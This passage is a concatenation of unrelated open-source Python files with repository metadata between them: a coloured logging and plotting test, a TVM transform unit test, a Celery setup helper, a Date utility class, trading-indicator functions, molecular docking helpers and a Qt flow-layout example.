default = logging.Formatter(fmt, datefmt)
return ColouredFormatter(default)
if __name__ == '__main__':
# some simple tests
# tell the built-in logger module to use our custom class when instantiating any new logger
logging.setLoggerClass(LoggerPlotter)
logger = logging.getLogger("test_logger")
logger.setLevel(logging.DEBUG)
# a console handler
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = ColouredFormatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
ch.setFormatter(formatter)
logger.addHandler(ch)
print("testing the logging code")
logger.debug('A DEBUG message')
logger.info('A INFO message')
logger.warning('A WARN message')
logger.error('A ERROR message')
logger.critical('A CRITICAL message')
plotlogger = logging.getLogger("plotting")
plotlogger.setLevel(logging.DEBUG)
# handler for plotting logger - will write only to console
plotlogger.addHandler(ch)
# # need a handler which will control where to save plots
# ph = PlotHandler("/tmp/plot_test/testing.pdf")
# logger.addHandler(ph)
print("testing the plotting code")
# the first argument is just a key for referring to this plot within the code
# the second argument says what kind of plot we will be making
plotlogger.set_plot_path("./tmp")
logger.create_plot('test plot', MultipleTimeSeriesPlot)
plotlogger.add_plot_point('test plot', 'validation', (1, 4))
plotlogger.add_plot_point('test plot', 'validation', (3, 2))
plotlogger.add_plot_point('test plot', 'validation', (2, 3))
plotlogger.add_plot_point('test plot', 'validation', (4, 3))
plotlogger.add_plot_point('test plot', 'training', (1, 3))
plotlogger.add_plot_point('test plot', 'training', (3, 1))
plotlogger.add_plot_point('test plot', 'training', (2, 2))
plotlogger.add_plot_point('test plot', 'training', (4, 4))
plotlogger.save_plot('test plot', title='Training and validation error', xlabel='epochs', ylabel='error')
weights = [[1, 2, 3, 3], [1, 1, 2, 1], [2, 1, 2, 2]]
logger.create_plot('activation weight', SingleWeightMatrixPlot)
plotlogger.add_plot_point('activation weight', 'weight1', weights)
plotlogger.add_plot_point('activation weight', 'weight2', weights)
plotlogger.add_plot_point('activation weight', 'weight3', weights)
plotlogger.save_plot('activation weight', title='weight', xlabel='dimension', ylabel='dimension')
| 38.80663
| 141
| 0.648206
|
3fb8331d39fca6a3bddae2b0f547188a36990a53
| 1,803
|
py
|
Python
|
tests/python/unittest/test_tir_transform_lower_init_block.py
|
Exhorder6/tvm
|
7e3f068373937c0ae08d58f67b84030a027db1c9
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 90
|
2019-01-26T00:38:49.000Z
|
2022-03-11T23:12:34.000Z
|
tests/python/unittest/test_tir_transform_lower_init_block.py
|
were/tvm
|
7f567264ae1bc1e4bc24a2eeb5b18425997dce22
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 91
|
2019-02-27T00:17:01.000Z
|
2022-02-21T18:08:21.000Z
|
tests/python/unittest/test_tir_transform_lower_init_block.py
|
were/tvm
|
7f567264ae1bc1e4bc24a2eeb5b18425997dce22
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | 41
|
2019-01-28T14:37:03.000Z
|
2022-03-31T03:58:57.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm import tir
from tvm.script import ty
@tvm.script.tir
class WithInit:
def main(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [64, 64, 64])
B = tir.match_buffer(b, [64])
with tir.block([64, tir.reduce_axis(0, 64), tir.reduce_axis(32, 64)]) as [i, j, k]:
with tir.init():
B[i] = tir.float32(0)
B[i] += A[i, j, k]
@tvm.script.tir
class WithBranch:
def main(a: ty.handle, b: ty.handle) -> None:
A = tir.match_buffer(a, [64, 64, 64])
B = tir.match_buffer(b, [64])
with tir.block([64, tir.reduce_axis(0, 64), tir.reduce_axis(32, 64)]) as [i, j, k]:
if (j == 0) and (k == 32):
B[i] = tir.float32(0)
B[i] += A[i, j, k]
def test_lower_reduction():
origin_mod = WithInit()
mod = tvm.tir.transform.LowerInitBlock()(origin_mod)
tvm.ir.assert_structural_equal(mod, WithBranch(), True)
if __name__ == "__main__":
test_lower_reduction()
| 33.388889
| 91
| 0.654465
|
195649c9b52da4f073b5e5a64fa15c287070de25
| 447
|
py
|
Python
|
bookoutlet_service/tasks.py
|
tmtaybah/bookoutlet_service
|
a1f2b42d07e2efdcd014319d1469a6dd9b77c1bb
|
[
"MIT"
] | null | null | null |
bookoutlet_service/tasks.py
|
tmtaybah/bookoutlet_service
|
a1f2b42d07e2efdcd014319d1469a6dd9b77c1bb
|
[
"MIT"
] | 6
|
2021-02-08T20:30:37.000Z
|
2022-03-11T23:43:41.000Z
|
bookoutlet_service/tasks.py
|
tmtaybah/bookoutlet_service
|
a1f2b42d07e2efdcd014319d1469a6dd9b77c1bb
|
[
"MIT"
] | null | null | null |
from celery import Celery
def make_celery(app):
celery = Celery(
app.import_name,
backend=app.config["CELERY_BACKEND"],
broker=app.config["CELERY_BROKER_URL"],
)
celery.conf.update(app.config)
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
| 23.526316
| 48
| 0.619687
|
efc15a3a27fea20ff5972fc4df32d3df4114ac88
| 7,582
|
py
|
Python
|
pineboolib/application/qsatypes/date.py
|
Aulla/pineboo
|
3ad6412d365a6ad65c3bb2bdc03f5798d7c37004
|
[
"MIT"
] | 2
|
2017-12-10T23:06:16.000Z
|
2017-12-10T23:06:23.000Z
|
pineboolib/application/qsatypes/date.py
|
Aulla/pineboo
|
3ad6412d365a6ad65c3bb2bdc03f5798d7c37004
|
[
"MIT"
] | 36
|
2017-11-05T21:13:47.000Z
|
2020-08-26T15:56:15.000Z
|
pineboolib/application/qsatypes/date.py
|
Aulla/pineboo
|
3ad6412d365a6ad65c3bb2bdc03f5798d7c37004
|
[
"MIT"
] | 8
|
2017-11-05T15:56:31.000Z
|
2019-04-25T16:32:28.000Z
|
"""
Module for Date type.
"""
from typing import Union, Optional, Any
from PyQt6 import QtCore # type: ignore[import]
from pineboolib.application.utils.date_conversion import date_dma_to_amd
class Date(object):
"""
Case que gestiona un objeto tipo Date.
"""
date_: "QtCore.QDate"
time_: "QtCore.QTime"
def __init__(self, *args: Union["Date", QtCore.QDate, str, QtCore.QTime, int]) -> None:
"""Create new Date object."""
super(Date, self).__init__()
if not args:
self.date_ = QtCore.QDate.currentDate()
self.time_ = QtCore.QTime.currentTime()
elif len(args) <= 2:
date_ = args[0]
format_ = args[1] if len(args) == 2 else "yyyy-MM-dd"
if not isinstance(format_, str):
raise ValueError("format must be string")
self.time_ = QtCore.QTime(0, 0)
if isinstance(date_, str):
if len(date_) == 10:
tmp = date_.split("-")
if len(tmp[2]) == 4:
date_amd = date_dma_to_amd(date_)
if date_amd is None:
raise ValueError("Date %s is invalid" % date_)
date_ = date_amd
self.date_ = QtCore.QDate.fromString(date_, format_)
else:
self.date_ = QtCore.QDate.fromString(date_[0:10], format_)
self.time_ = QtCore.QTime.fromString(date_[11:], "hh:mm:ss")
elif isinstance(date_, Date):
self.date_ = date_.date_
self.time_ = date_.time_
elif isinstance(date_, QtCore.QDate):
self.date_ = date_
elif isinstance(date_, (float, int)):
date_time = QtCore.QDateTime()
date_time.setMSecsSinceEpoch(int(date_))
self.date_ = date_time.date()
self.time_ = date_time.time()
else:
raise ValueError("Unexpected type %s" % type(date_))
if not self.time_:
self.time_ = QtCore.QTime(0, 0)
else:
year, month, day = args[0], args[1], args[2]
if not isinstance(year, int) or not isinstance(month, int) or not isinstance(day, int):
raise ValueError("Expected year, month, day as integers")
self.date_ = QtCore.QDate(year, month, day)
self.time_ = QtCore.QTime(0, 0)
def toString(self, pattern: Optional[str] = None) -> str:
"""
Return string with date & time data.
@return cadena de texto con los datos de fecha y hora
"""
if not pattern:
pattern = "yyyy-MM-ddT%s" % self.time_.toString("hh:mm:ss")
return self.date_.toString(pattern)
def getTime(self) -> int:
"""Get integer representing date & time."""
return int(self.date_.toString("yyyyMMdd%s" % self.time_.toString("hhmmss")))
def getYear(self) -> int:
"""
Return year from date.
@return año
"""
return self.date_.year()
def setYear(self, year: Union[str, int]) -> "Date":
"""
Set year into current date.
@param yyyy. Año a setear
"""
self.date_ = QtCore.QDate.fromString(self.date_.toString("%s-MM-dd" % year), "yyyy-MM-dd")
return self
def getMonth(self) -> int:
"""
Get month as a number from current date.
@return mes
"""
return self.date_.month()
def setMonth(self, month: Union[str, int]) -> "Date":
"""
Set month into current date.
@param mm. Mes a setear
"""
month = str(month)
if len(month) < 2:
month = "0%s" % month
self.date_ = QtCore.QDate.fromString(
self.date_.toString("yyyy-%s-dd" % month), "yyyy-MM-dd"
)
return self
def getDay(self) -> int:
"""
Get day from current date.
@return día
"""
return self.date_.day()
def setDay(self, day: Union[str, int]) -> "Date":
"""
Set given day.
@param dd. Dia a setear
"""
day = str(day)
if len(day) < 2:
day = "0%s" % day
self.date_ = QtCore.QDate.fromString(self.date_.toString("yyyy-MM-%s" % day), "yyyy-MM-dd")
return self
def getHours(self) -> int:
"""
Get Hour from Date.
@return horas
"""
return self.time_.hour()
def getMinutes(self) -> int:
"""
Get Minutes from Date.
@return minutos
"""
return self.time_.minute()
def getSeconds(self) -> int:
"""
Get Seconds from Date.
@return segundos
"""
return self.time_.second()
def getMilliseconds(self) -> int:
"""
Get Milliseconds from Date.
@return milisegundos
"""
return self.time_.msec()
getDate = getDay
# setDate = setDay
def setDate(self, date: Any) -> "Date":
"""
Set Date from any format.
@param date. Fecha a setear
"""
year_ = self.date_.toString("yyyy")
month_ = self.date_.toString("MM")
day_ = str(date)
if len(day_) == 1:
day_ = "0" + day_
str_ = "%s-%s-%s" % (year_, month_, day_)
self.date_ = QtCore.QDate.fromString(str_, "yyyy-MM-dd")
return self
def addDays(self, days: int) -> "Date":
"""
Return result of adding a particular amount of days to current date.
@param d. Dias a sumar (o restar) a la fecha dada
@return nueva fecha calculada
"""
return Date(self.date_.addDays(days).toString("yyyy-MM-dd"))
def addMonths(self, months: int) -> "Date":
"""
Return result of adding given number of months to this date.
@param m. Meses a sumar (o restar) a la fecha dada
@return nueva fecha calculada
"""
return Date(self.date_.addMonths(months).toString("yyyy-MM-dd"))
def addYears(self, years: int) -> "Date":
"""
Return result of adding given number of years to this date.
@param y. Años a sumar (o restar) a la fecha dada
@return nueva fecha calculada
"""
return Date(self.date_.addYears(years).toString("yyyy-MM-dd"))
@classmethod
def parse(cls, value: str) -> "Date":
"""Parse a ISO string into a date."""
return Date(value, "yyyy-MM-dd")
def __str__(self) -> str:
"""Support for str()."""
return self.toString()
def __repr__(self) -> str:
"""Support for str()."""
return self.toString()
def __lt__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) < str(other)
def __le__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) <= str(other)
def __ge__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) >= str(other)
def __gt__(self, other: Union[str, "Date"]) -> bool:
"""Support for comparisons."""
return str(self) > str(other)
def __eq__(self, other: Any) -> bool:
"""Support for comparisons."""
return str(other) == str(self)
def __ne__(self, other: Any) -> bool:
"""Support for comparisons."""
return not self.__eq__(other)
| 28.828897
| 99
| 0.533369
|
b6620d3c76714b844c3efee2c49bbf54692694af
| 7,535
|
py
|
Python
|
Indicators/fisher_multi_pack_dw.py
|
Desil-sketch/Indicators-for-Jesse
|
ffe33a217002ea3034696fe38acfa72611d52b4f
|
[
"MIT"
] | 1
|
2021-12-08T06:34:48.000Z
|
2021-12-08T06:34:48.000Z
|
Indicators/fisher_multi_pack_dw.py
|
Desil-sketch/Indicators-for-Jesse
|
ffe33a217002ea3034696fe38acfa72611d52b4f
|
[
"MIT"
] | null | null | null |
Indicators/fisher_multi_pack_dw.py
|
Desil-sketch/Indicators-for-Jesse
|
ffe33a217002ea3034696fe38acfa72611d52b4f
|
[
"MIT"
] | 1
|
2021-11-04T17:40:19.000Z
|
2021-11-04T17:40:19.000Z
|
from jesse.helpers import get_candle_source, slice_candles, np_shift, same_length
import numpy as np
from numba import njit,jit
import talib
from typing import Union
from jesse.helpers import get_config
from collections import namedtuple
from numpy.lib.stride_tricks import as_strided
FISHMULT = namedtuple('FISHMULT',['osc', 'basiscolor', 'barcolor'])
'''
https://www.tradingview.com/script/hXp5irRI-Fisher-Multi-Pack-DW/#chart-view-comments
no compression, thresholds, or cmean
'''
def fishmulti(candles: np.ndarray, per: int= 13,smooth:bool=False,smper:int=1,otype:str="Fisher Transform",alpha:float=0.1, hth:float=0.95,lth:float=-0.95, source_type: str = "close", sequential: bool = False ) -> FISHMULT:
candles = slice_candles(candles, sequential)
source = get_candle_source(candles, source_type=source_type)
if otype == "Fisher Transform":
highval = same_length(candles,max_rolling1(source,per))
lowval = same_length(candles,min_rolling1(source,per))
fisher = fish(source,source,per,highval,lowval)
osc1 = fisher
elif otype == "Inverse Fisher RSI":
ifrsi = ifish_rsi(source,source,per,candles,alpha)
osc1 = ifrsi
elif otype == "Inverse Fisher Stochastic":
candles_high = candles[:, 3]
candles_low = candles[:, 4]
hh = talib.MAX(candles_high, per)
ll = talib.MIN(candles_low, per)
stoch1 = 100 * (source - ll) / (hh - ll)
STOCH = same_length(candles,stoch1)
ifstoch = ifish_stoch(source,source,per,candles,alpha,STOCH)
osc1 = ifstoch
else:
rollwin = talib.SMA(source,per)
CCI = pine_cci(source,per,rollwin)
ifcci = ifish_cci(source,source,per,candles,alpha,CCI)
osc1 = ifcci
osc2 = pine_ema(source,osc1,smper) if smooth else pine_ema(source,osc1,1)
osc = osc2
basiscolor, barcolor = barcolor1(source,osc,hth,lth)
if sequential:
return FISHMULT(osc,basiscolor,barcolor)
else:
return FISHMULT(osc[-1],basiscolor[-1],barcolor[-1])
@njit
def barcolor1(source,osc,hth,lth):
barcolor = np.full_like(source,0)
basiscolor = np.full_like(source,0)
for i in range(source.shape[0]):
if (osc[i] > 0) and (osc[i] >= osc[i-1]) and (osc[i] >= hth):
barcolor[i] = 2
elif (osc[i] >0) and (osc[i] > osc[i-1]) and (osc[i] < hth):
barcolor[i] = 1.5
elif (osc[i] > 0) and (osc[i] <osc[i-1]):
barcolor[i] = 1
elif (osc[i] < 0) and (osc[i] <= osc[i-1]) and (osc[i] <= lth):
barcolor[i] = -2
elif (osc[i] <0) and (osc[i] < osc[i-1]) and (osc[i] > lth):
barcolor[i] = -1.5
elif (osc[i] <0) and (osc[i] > osc[i-1]):
barcolor[i] = -1
else:
barcolor[i] = 0
if osc[i] > 0:
basiscolor[i] = 1
elif osc[i] < 0:
basiscolor[i] = -1
else:
basiscolor[i] = 0
return basiscolor, barcolor
@njit
def pine_cci(source,per,rollwin):
mamean = np.full_like(source,0)
cci = np.full_like(source,0)
dev = np.full_like(source,0)
for i in range(source.shape[0]):
sum1 = 0.0
val = 0.0
for j in range(per):
val = source[i-j]
sum1 = sum1 + np.abs(val - rollwin[i])
dev[i] = sum1/per
cci[i] = (source[i] - rollwin[i]) / (0.015 * dev[i])
return cci
@njit
def pine_rsi(source,length):
u = np.full_like(source, 0)
d = np.full_like(source, 0)
rs = np.full_like(source, 0)
res = np.full_like(source, 0)
alpha = 1 / length
sumation1 = np.full_like(source, 1)
sumation2 = np.full_like(source, 1)
for i in range(source.shape[0]):
u[i] = np.maximum((source[i] - source[i-1]),0)
d[i] = np.maximum((source[i-1] - source[i]), 0)
sumation1[i] = alpha * u[i] + (1 - alpha) * (sumation1[i-1])
sumation2[i] = alpha * d[i] + (1 - alpha) * (sumation2[i-1])
rs[i] = sumation1[i]/sumation2[i]
res[i] = 100 - 100 / ( 1 + rs[i])
return res
@jit(nopython=True, error_model="numpy")
def fish(source,x,t,highval,lowval):
val1 = np.full_like(source,0)
val2 = np.full_like(source,0)
fish = np.full_like(source,0)
for i in range(t,source.shape[0]):
# val1[i-1] = 0 if np.isnan(val1[i-1]) else val1[i-1]
val1[i] = 0.66 * ((x[i] - lowval[i])/np.maximum((highval[i] - lowval[i]),0.001)-0.5) + 0.67*val1[i-1]
if val1[i] > 0.99:
val2[i] = 0.999
elif val1[i] < -0.99:
val2[i] = -0.999
else:
val2[i] = val1[i]
fish[i] = 0.5 * np.log((1+val2[i])/np.maximum(1-val2[i],0.001)) + 0.5*fish[i-1]
return fish
@njit
def ifish_rsi(source,x,t,candles,alpha):
val = np.full_like(source,0)
rsi = np.full_like(source,0)
wval1 = np.full_like(source,0.0)
wval2 = np.full_like(source,0.0)
ifish = np.full_like(source,0)
for i in range(source.shape[0]):
rsi = pine_rsi(x,t)
val[i] = alpha*(rsi[i]-50)
wval1 = pine_wma(source,val,t)
wval2 = np.concatenate((np.full((candles.shape[0] - wval1.shape[0]), np.nan), wval1))
ifish[i] = (np.exp(2*wval2[i]) - 1)/(np.exp(2*wval2[i])+1)
return ifish
@njit
def ifish_stoch(source,x,t,candles,alpha,stoch):
val = np.full_like(source,0)
wval1 = np.full_like(source,0.0)
wval2 = np.full_like(source,0.0)
ifish = np.full_like(source,0)
for i in range(source.shape[0]):
val[i] = alpha*(stoch[i]-50)
wval1 = pine_wma(source,val,t)
wval2 = np.concatenate((np.full((candles.shape[0] - wval1.shape[0]), np.nan), wval1))
ifish[i] = (np.exp(2*wval2[i]) - 1)/(np.exp(2*wval2[i])+1)
return ifish
@njit
def ifish_cci(source,x,t,candles,alpha,CCI):
val = np.full_like(source,0)
wval1 = np.full_like(source,0.0)
wval2 = np.full_like(source,0.0)
ifish = np.full_like(source,0)
for i in range(source.shape[0]):
val[i] = alpha*(CCI[i])
wval1 = pine_wma(source,val,t)
wval2 = np.concatenate((np.full((candles.shape[0] - wval1.shape[0]), np.nan), wval1))
ifish[i] = (np.exp(2*wval2[i]) - 1)/(np.exp(2*wval2[i])+1)
return ifish
@njit
def pine_wma(source1,source2,length):
res = np.full_like(source1,length)
for i in range(source1.shape[0]):
weight = 0.0
norm = 0.0
sum1 = 0.0
for j in range(length):
weight = (length - j)*length
norm = norm + weight
sum1 = sum1 + source2[i-j] * weight
res[i] = sum1/norm
return res
@njit
def pine_ema(source1, source2, length):
alpha = 2 / (length + 1)
sum1 = np.full_like(source1,0)
for i in range(10,source1.shape[0]):
sum1[i-1] = 0 if np.isnan(sum1[i-1]) else sum1[i-1]
sum1[i] = alpha * source2[i] + (1 - alpha) * sum1[i-1]
return sum1
def max_rolling1(a, window,axis =1):
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
rolling = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
return np.max(rolling,axis=axis)
def min_rolling1(a, window,axis =1):
shape = a.shape[:-1] + (a.shape[-1] - window + 1, window)
strides = a.strides + (a.strides[-1],)
rolling = np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)
return np.min(rolling,axis=axis)
| 37.118227
| 227
| 0.583809
|
484b2c44321272bf21c278413f4e47597e29f872
| 4,627
|
py
|
Python
|
AlGDock/Aux_func.py
|
xinliu0609/AlGDock
|
0795a9cfea690e1d287b8eb2be5ed8586f61b2d3
|
[
"MIT"
] | null | null | null |
AlGDock/Aux_func.py
|
xinliu0609/AlGDock
|
0795a9cfea690e1d287b8eb2be5ed8586f61b2d3
|
[
"MIT"
] | null | null | null |
AlGDock/Aux_func.py
|
xinliu0609/AlGDock
|
0795a9cfea690e1d287b8eb2be5ed8586f61b2d3
|
[
"MIT"
] | null | null | null |
import os #Miscellaneous operating system interfaces
from os.path import abspath
from os.path import exists
from os.path import isfile
from os.path import join
import cPickle as pickle
import gzip
import copy
import time
import numpy as np
import MMTK
import MMTK.Units
from MMTK.ParticleProperties import Configuration
import Scientific
from Scientific_vector import Vector # @UnresolvedImport
import AlGDock as a
import pymbar.timeseries
########################
# Auxilliary functions #
########################
def random_rotate():
"""
Return a random rotation matrix
"""
u = np.random.uniform(size=3)
# Random quaternion
q = np.array([np.sqrt(1-u[0])*np.sin(2*np.pi*u[1]),
np.sqrt(1-u[0])*np.cos(2*np.pi*u[1]),
np.sqrt(u[0])*np.sin(2*np.pi*u[2]),
np.sqrt(u[0])*np.cos(2*np.pi*u[2])])
# Convert the quaternion into a rotation matrix
rotMat = np.array([[q[0]*q[0] + q[1]*q[1] - q[2]*q[2] - q[3]*q[3],
2*q[1]*q[2] - 2*q[0]*q[3],
2*q[1]*q[3] + 2*q[0]*q[2]],
[2*q[1]*q[2] + 2*q[0]*q[3],
q[0]*q[0] - q[1]*q[1] + q[2]*q[2] - q[3]*q[3],
2*q[2]*q[3] - 2*q[0]*q[1]],
[2*q[1]*q[3] - 2*q[0]*q[2],
2*q[2]*q[3] + 2*q[0]*q[1],
q[0]*q[0] - q[1]*q[1] - q[2]*q[2] + q[3]*q[3]]])
return rotMat
# def choice(N, weights=None):
# """
# Weighted random number selection of N values
# """
# weights /= np.sum(weights)
# cumweights = np.cumsum(weights)
# beginIndicies = np.zeros(N, dtype=int)
# randVals = np.random.uniform(size=N)
#
# for (bI_idx,randVal) in zip(range(N),randVals):
# beginIndicies[bI_idx] = sum(cumweights < randVal)
# beginIndicies.sort()
# return beginIndicies
def merge_dictionaries(dicts, required_consistency=[], print_inconsistent=False):
"""
Merges a list of dictionaries, giving priority to items in descending order.
Items in the required_consistency list must be consistent with one another.
"""
merged = {}
for a in range(len(dicts)): # Loop over all dictionaries,
# giving priority to the first
if not isinstance(dicts[a],dict):
continue
for key in dicts[a].keys():
if dicts[a][key] is None:
if not key in merged.keys():
merged[key] = None
elif isinstance(dicts[a][key],dict):
merged[key] = merge_dictionaries(
[dicts[n][key] for n in range(len(dicts)) if key in dicts[n].keys()],
required_consistency=required_consistency)
else:
# Check for consistency with other dictionaries
for b in (range(a) + range(a+1,len(dicts))):
if isinstance(dicts[b],dict) and (key in dicts[b].keys()) and (dicts[b][key] is not None):
if (isinstance(dicts[b][key],np.ndarray)):
inconsistent_items = (dicts[b][key]!=dicts[a][key]).any()
else:
inconsistent_items = (dicts[b][key]!=dicts[a][key])
if inconsistent_items:
if print_inconsistent:
print 'Dictionary items are inconsistent:'
print dicts[a][key]
print dicts[b][key]
if key in required_consistency:
raise Exception('Items must be consistent!')
merged[key] = dicts[a][key]
return merged
def convert_dictionary_relpath(d, relpath_o=None, relpath_n=None):
"""
Converts all file names in a dictionary from one relative path to another.
If relpath_o is None, nothing is joined to the original path.
If relpath_n is None, an absolute path is used.
"""
converted = {}
for key in d.keys():
if d[key] is None:
pass
elif isinstance(d[key],dict):
converted[key] = convert_dictionary_relpath(d[key],
relpath_o = relpath_o, relpath_n = relpath_n)
elif isinstance(d[key],str):
if relpath_o is not None:
p = abspath(join(relpath_o,d[key]))
else:
p = abspath(d[key])
if exists(p): # Only save file names for existent paths
if relpath_n is not None:
converted[key] = os.path.relpath(p,relpath_n)
else:
converted[key] = p
return converted
def HMStime(s):
"""
Given the time in seconds, an appropriately formatted string.
"""
if s<60.:
return '%.3f s'%s
elif s<3600.:
return '%d:%.3f'%(int(s/60%60),s%60)
else:
return '%d:%d:%.3f'%(int(s/3600),int(s/60%60),s%60)
class NullDevice():
"""
A device to suppress output
"""
def write(self, s):
pass
| 31.910345
| 100
| 0.582019
|
57e54155587215186454f9b781d8f9aa07fd3127
| 5,386
|
py
|
Python
|
venv/Lib/site-packages/PySide2/examples/widgets/layouts/flowlayout.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/PySide2/examples/widgets/layouts/flowlayout.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/PySide2/examples/widgets/layouts/flowlayout.py
|
TEDxVienna/continuum
|
85cefbc274fc59e2059c313bc0d3b9b93a34ba6d
|
[
"MIT"
] | null | null | null |
############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2016 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing/
##
## This file is part of the Qt for Python examples of the Qt Toolkit.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of The Qt Company Ltd nor the names of its
## contributors may be used to endorse or promote products derived
## from this software without specific prior written permission.
##
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
## $QT_END_LICENSE$
##
#############################################################################
"""PySide2 port of the widgets/layouts/flowlayout example from Qt v5.x"""
from PySide2 import QtCore, QtGui, QtWidgets
class Window(QtWidgets.QWidget):
def __init__(self):
super(Window, self).__init__()
flowLayout = FlowLayout()
flowLayout.addWidget(QtWidgets.QPushButton("Short"))
flowLayout.addWidget(QtWidgets.QPushButton("Longer"))
flowLayout.addWidget(QtWidgets.QPushButton("Different text"))
flowLayout.addWidget(QtWidgets.QPushButton("More text"))
flowLayout.addWidget(QtWidgets.QPushButton("Even longer button text"))
self.setLayout(flowLayout)
self.setWindowTitle("Flow Layout")
class FlowLayout(QtWidgets.QLayout):
def __init__(self, parent=None, margin=0, spacing=-1):
super(FlowLayout, self).__init__(parent)
if parent is not None:
self.setMargin(margin)
self.setSpacing(spacing)
self.itemList = []
def __del__(self):
item = self.takeAt(0)
while item:
item = self.takeAt(0)
def addItem(self, item):
self.itemList.append(item)
def count(self):
return len(self.itemList)
def itemAt(self, index):
if index >= 0 and index < len(self.itemList):
return self.itemList[index]
return None
def takeAt(self, index):
if index >= 0 and index < len(self.itemList):
return self.itemList.pop(index)
return None
def expandingDirections(self):
return QtCore.Qt.Orientations(QtCore.Qt.Orientation(0))
def hasHeightForWidth(self):
return True
def heightForWidth(self, width):
height = self.doLayout(QtCore.QRect(0, 0, width, 0), True)
return height
def setGeometry(self, rect):
super(FlowLayout, self).setGeometry(rect)
self.doLayout(rect, False)
def sizeHint(self):
return self.minimumSize()
def minimumSize(self):
size = QtCore.QSize()
for item in self.itemList:
size = size.expandedTo(item.minimumSize())
size += QtCore.QSize(2 * self.contentsMargins().top(), 2 * self.contentsMargins().top())
return size
def doLayout(self, rect, testOnly):
x = rect.x()
y = rect.y()
lineHeight = 0
for item in self.itemList:
wid = item.widget()
spaceX = self.spacing() + wid.style().layoutSpacing(QtWidgets.QSizePolicy.PushButton, QtWidgets.QSizePolicy.PushButton, QtCore.Qt.Horizontal)
spaceY = self.spacing() + wid.style().layoutSpacing(QtWidgets.QSizePolicy.PushButton, QtWidgets.QSizePolicy.PushButton, QtCore.Qt.Vertical)
nextX = x + item.sizeHint().width() + spaceX
if nextX - spaceX > rect.right() and lineHeight > 0:
x = rect.x()
y = y + lineHeight + spaceY
nextX = x + item.sizeHint().width() + spaceX
lineHeight = 0
if not testOnly:
item.setGeometry(QtCore.QRect(QtCore.QPoint(x, y), item.sizeHint()))
x = nextX
lineHeight = max(lineHeight, item.sizeHint().height())
return y + lineHeight - rect.y()
if __name__ == '__main__':
import sys
app = QtWidgets.QApplication(sys.argv)
mainWin = Window()
mainWin.show()
sys.exit(app.exec_())
| 34.525641
| 153
| 0.644077
|
99f2e5520656f5514b4e62a0faf7bb104b052dc9
| 4,458
|
py
|
Python
|
python/dgl/nn/pytorch/conv/ginconv.py
|
joshcarty/dgl
|
4464b9734c1061bd84325a54883c5046031def37
|
[
"Apache-2.0"
] | 4
|
2018-12-25T14:59:08.000Z
|
2021-07-02T12:36:40.000Z
|
python/dgl/nn/pytorch/conv/ginconv.py
|
xyanAI/dgl
|
36daf66f6216bad4d30651311bcb87aa45dd33d5
|
[
"Apache-2.0"
] | 1
|
2019-02-06T02:02:41.000Z
|
2019-02-06T20:22:32.000Z
|
python/dgl/nn/pytorch/conv/ginconv.py
|
xyanAI/dgl
|
36daf66f6216bad4d30651311bcb87aa45dd33d5
|
[
"Apache-2.0"
] | 4
|
2020-12-26T10:39:36.000Z
|
2020-12-26T12:38:52.000Z
|
"""Torch Module for Graph Isomorphism Network layer"""
# pylint: disable= no-member, arguments-differ, invalid-name
